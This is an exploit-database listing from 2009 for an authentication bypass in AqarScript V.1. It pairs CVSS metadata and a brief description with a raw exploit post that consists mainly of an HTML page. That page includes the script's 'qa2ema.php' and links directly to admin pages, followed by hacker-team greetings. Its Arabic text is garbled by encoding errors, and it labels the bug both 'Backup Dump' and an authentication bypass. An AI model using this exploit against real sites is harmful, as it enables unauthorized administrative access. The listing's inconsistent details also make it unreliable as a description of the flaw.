Aqar Script V.1 Remote By pass Exploit

vendor:

AqarScript V.1

by:

indoushka

8,8

CVSS

HIGH

Remote Bypass Exploit

287

CWE

Product Name: AqarScript V.1

Affected Version From: V.1

Affected Version To: V.1

Patch Exists: YES

Related CWE: N/A

CPE: a:aqarscript:aqarscript_v1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows SP2 Français, Lunix Français v.(9.4 Ubuntu)

2009

Aqar Script V.1 Remote By pass Exploit

A vulnerability in Aqar Script V.1 allows an attacker to bypass authentication and gain access to the system. The vulnerability exists due to insufficient validation of user-supplied input in the 'qa2ema.php' script. A remote attacker can exploit this vulnerability to bypass authentication and gain access to the system.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.

Source

Exploit-DB raw data:

========================================================================================
| # Title : Aqar Script V.1 Remote By pass Exploit
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.iqs3cur1ty.com/vb
| # Script : Powered By AqarScript
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
| # Bug : Backup Dump
====================== Exploit By indoushka =================================
# Exploit :

<html dir=rtl>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<body>
<table border="0" cellspacing="5" cellpadding="0">
<tr>
<td width="100%" colspan="3" valign="top" align="right">
<h1>áæÍÉ ÇáÊÍßã - ÚÞÇÑ ÓßÑíÈÊ</h1>
</td>
<td width="100%" valign="top" align="right">
</td>
</tr>
<tr>
<td valign="top" align="right" nowrap>
<?php
include("./qa2ema.php");
?>
</td>
<meta http-equiv="Content-Language" content="ar-eg">
<td valign="top" align="right"><font face="Tahoma">ÇåáÇð Èß Ýì áæÍÉ
ÇáÊÍßã ÇáÎÇÕÉ ÈÚÞÇÑ ÓßÑíÈÊ<br>
Çä ÔÇÁ Çááå ÎÇÕíÉ ÇÖÇÝÉ ÇãÇßä ÇÖÇÝíÉ Ýì ÕÝÍÉ ÇáÇÖÇÝÉ <br>
ÓÊßæä ãæÌæÏÉ Ýì ÇáäÓÎÉ 2<br>
<br>
<b><font size="1">ãÚ ÊÍíÇÊ ßÑíã äÊ</font></b></font>
</tr>
</table>
</body>
<ul>
<li><a href="http://127.0.0.1/Aqar/admin/aksam.php">ÇáÃÞÓÇã</a></li>
<li><a href="http://127.0.0.1/Aqar/admin/amaken.php">ÇáÇãÇßä ÇáÇÖÇÝíÉ</a></li>
</ul>
</html>

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team : (loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------